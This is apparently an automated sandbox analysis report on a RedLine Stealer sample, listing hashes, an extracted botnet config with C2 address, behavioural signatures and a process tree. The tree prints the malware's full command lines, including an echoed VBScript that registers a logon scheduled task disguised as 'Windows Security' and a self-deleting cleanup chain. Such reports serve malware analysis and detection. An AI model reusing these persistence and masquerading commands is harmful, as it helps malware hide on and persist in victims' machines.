Analysis
- max time kernel: 151s
- max time network: 152s
- platform: windows10_x64
- resource: win10-20220310-en
- submitted: 21-03-2022 15:40
- Static task: static1
- Behavioral task: behavioral1
- Sample: 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
- Resource: win10-20220310-en
General
- Target: 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
- Size: 102KB
- MD5: 37bd9e1832978b6c5044fdc28694c765
- SHA1: a6840f04877701c607d8afa373ee6ec86a4a3975
- SHA256: 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973
- SHA512: d0e7972c9d67384ac59c76f763a1f8ab3fec921db68beee321cb91e47a35fafa789396baee10c8ade0d1585c450a2f4f5ce2a2b05d1b6466ee985bcfaced79e4
Malware Config
Extracted
- Family: redline
- Botnet: @JABKA9983
- C2: 65.108.82.103:15914
- auth_value: 3da459a4f4fcd6fe99288a78b3680c31
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (1 IoC)
  Processes:
  resource: behavioral1/memory/2552-118-0x0000000000C50000-0x0000000000C70000-memory.dmp, yara_rule: family_redline
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes:
  pid 912: build.exe
  pid 3832: Windows Security.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Delays execution with timeout.exe (1 IoC)
  Processes:
  pid 1248: timeout.exe
- Kills process with taskkill (1 IoC)
  Processes:
  pid 4040: taskkill.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (repeated events collapsed to one entry per process):
  pid 2552: 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
  pid 912: build.exe
  pid 3832: Windows Security.exe
  pid 3148: powershell.exe
  pid 2916: powershell.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
  pid 3832: Windows Security.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege, pid 2552, 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
  Token: SeDebugPrivilege, pid 912, build.exe
  Token: SeDebugPrivilege, pid 3832, Windows Security.exe
  Token: SeDebugPrivilege, pid 4040, taskkill.exe
  Token: SeDebugPrivilege, pid 3148, powershell.exe
  Token: SeDebugPrivilege, pid 2916, powershell.exe
  Token: SeDebugPrivilege, pid 516, powershell.exe
- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes (source pid/process wrote to memory of target pid/process; each pair was recorded twice):
  2552 18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe -> 912 build.exe
  912 build.exe -> 1440 cmd.exe
  1440 cmd.exe -> 3832 Windows Security.exe
  912 build.exe -> 3220 cmd.exe
  3220 cmd.exe -> 4040 taskkill.exe
  3832 Windows Security.exe -> 192 cmd.exe
  192 cmd.exe -> 1888 cscript.exe
  3220 cmd.exe -> 3148 powershell.exe
  3832 Windows Security.exe -> 680 cmd.exe
  680 cmd.exe -> 2916 powershell.exe
  3220 cmd.exe -> 1248 timeout.exe
  3832 Windows Security.exe -> 816 cmd.exe
  816 cmd.exe -> 516 powershell.exe
Processes (tree; the number in brackets is the depth in the process tree)
- [1] C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\build.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\build.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
        Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & del C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs /f /q & exit
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\cscript.exe
            Command line: cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs
        - [5] C:\Windows\SYSTEM32\cmd.exe
          Command line: "cmd.exe" /c powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc" & exit
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        - [5] C:\Windows\SYSTEM32\cmd.exe
          Command line: "cmd.exe" /c powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)" & exit
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)"
            - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c taskkill /F /PID 912 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe" & exit
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\taskkill.exe
        Command line: taskkill /F /PID 912
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\timeout.exe
        Command line: timeout 3
        - Delays execution with timeout.exe
Downloads (dropped and written files; entries the report listed twice are shown once)
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: 17286868c0a043ae5d2ff5798b6a3163
  SHA1: b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
  SHA256: 40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
  SHA512: e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 9a3b058eeb3866979a8ae40c50afcad5
  SHA1: 5cb721e20622946ae015bb8f29fd731d9c722602
  SHA256: a68952b9b61d0da3111b16a8572c35c16f06b95d33b0f7da73ef831584abb9da
  SHA512: 0c741adc8ab9e9a91429dbef62ced45a5887da080caae289a86e2b5f9a721733d8e0d000765fa826805d9288d9485ed42b3a7f0e87e042d142b0b6eeb41f6cec
- C:\Users\Admin\AppData\Local\Temp\build.exe
  MD5: d1db0a92a4c72b887cc16a32e9d285a8
  SHA1: 87d0c2dffc47615b70557399c8cf937f55599713
  SHA256: 95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b
  SHA512: 31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71
- C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs
  MD5: d40d18b617c382f94c2cf8f4ee7e9682
  SHA1: 7669d7e3b770f35be2a516ffacd481437eb93f3e
  SHA256: 5459eaee5107d59891a50f3d2b6d7eef0ac30216ae66e0e6a010f34c23d2f770
  SHA512: 22101058b8d14b320216e2f698f9f985e6f52e821c62c3fb9a09b9eb0d7537339676e11728ed978ac9191c032335d1d86c56b34065b9f22f85e43a9bdeaafbac
- C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe (same hashes as build.exe above)
  MD5: d1db0a92a4c72b887cc16a32e9d285a8
  SHA1: 87d0c2dffc47615b70557399c8cf937f55599713
  SHA256: 95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b
  SHA512: 31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71